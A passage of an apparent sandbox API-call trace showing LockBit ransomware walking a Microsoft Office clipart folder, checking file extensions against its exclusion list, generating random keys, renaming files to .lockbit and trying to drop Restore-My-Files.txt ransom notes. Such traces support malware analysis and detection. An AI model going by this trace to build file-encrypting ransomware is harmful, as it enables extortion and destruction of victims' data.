(FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.200] free (_Block=0x77d7a8) [0142.200] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.200] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.200] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563e0210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107734.WMF", cAlternateFileName="")) returned 1 [0142.200] lstrcmpiW (lpString1=".", lpString2="J0107734.WMF") returned -1 [0142.200] lstrcmpiW (lpString1="..", lpString2="J0107734.WMF") returned -1 [0142.200] PathFindExtensionW (pszPath="J0107734.WMF") returned=".WMF" [0142.200] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.200] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.200] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.201] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.201] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107734.WMF") returned 1 [0142.202] lstrcmpiW (lpString1="ntldr", lpString2="J0107734.WMF") returned 1 [0142.202] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107734.WMF") returned 1 [0142.202] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107734.WMF") returned -1 [0142.202] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107734.WMF") returned -1 [0142.202] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107734.WMF") returned 1 [0142.202] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107734.WMF") returned -1 [0142.202] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.202] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned=".WMF" [0142.202] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.202] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.202] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.203] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.203] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.lockbit") returned 72 [0142.203] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.204] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.204] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.204] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3140) returned 1 [0142.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.204] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.233] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.233] malloc (_Size=0xa6) returned 0x77d7a8 [0142.233] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0142.233] free (_Block=0x77d7a8) [0142.233] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.233] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.233] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563e0210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107742.WMF", cAlternateFileName="")) returned 1 [0142.233] lstrcmpiW (lpString1=".", lpString2="J0107742.WMF") returned -1 [0142.233] lstrcmpiW (lpString1="..", lpString2="J0107742.WMF") returned -1 [0142.233] PathFindExtensionW (pszPath="J0107742.WMF") returned=".WMF" [0142.233] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.233] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.233] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.233] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.233] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.234] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.234] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107742.WMF") returned 1 [0142.235] lstrcmpiW (lpString1="ntldr", lpString2="J0107742.WMF") returned 1 [0142.235] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107742.WMF") returned 1 [0142.235] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107742.WMF") returned -1 [0142.235] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107742.WMF") returned -1 [0142.235] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107742.WMF") returned 1 [0142.235] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107742.WMF") returned -1 [0142.235] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.235] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned=".WMF" [0142.235] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.235] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.235] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.236] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.236] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.lockbit") returned 72 [0142.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0142.237] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.237] malloc (_Size=0x40068) returned 0x3df0008 [0142.237] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3644) returned 1 [0142.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.238] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.239] malloc (_Size=0xa6) returned 0x77d7a8 [0142.239] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.240] free (_Block=0x77d7a8) [0142.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.240] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.240] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107744.WMF", cAlternateFileName="")) returned 1 [0142.240] lstrcmpiW (lpString1=".", lpString2="J0107744.WMF") returned -1 [0142.240] lstrcmpiW (lpString1="..", lpString2="J0107744.WMF") returned -1 [0142.240] PathFindExtensionW (pszPath="J0107744.WMF") returned=".WMF" [0142.240] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.240] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.240] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.241] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.241] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107744.WMF") returned 1 [0142.242] lstrcmpiW (lpString1="ntldr", lpString2="J0107744.WMF") returned 1 [0142.242] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107744.WMF") returned 1 [0142.242] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107744.WMF") returned -1 [0142.242] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107744.WMF") returned -1 [0142.242] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107744.WMF") returned 1 [0142.242] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107744.WMF") returned -1 [0142.242] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.242] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned=".WMF" [0142.242] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.242] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.242] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.242] 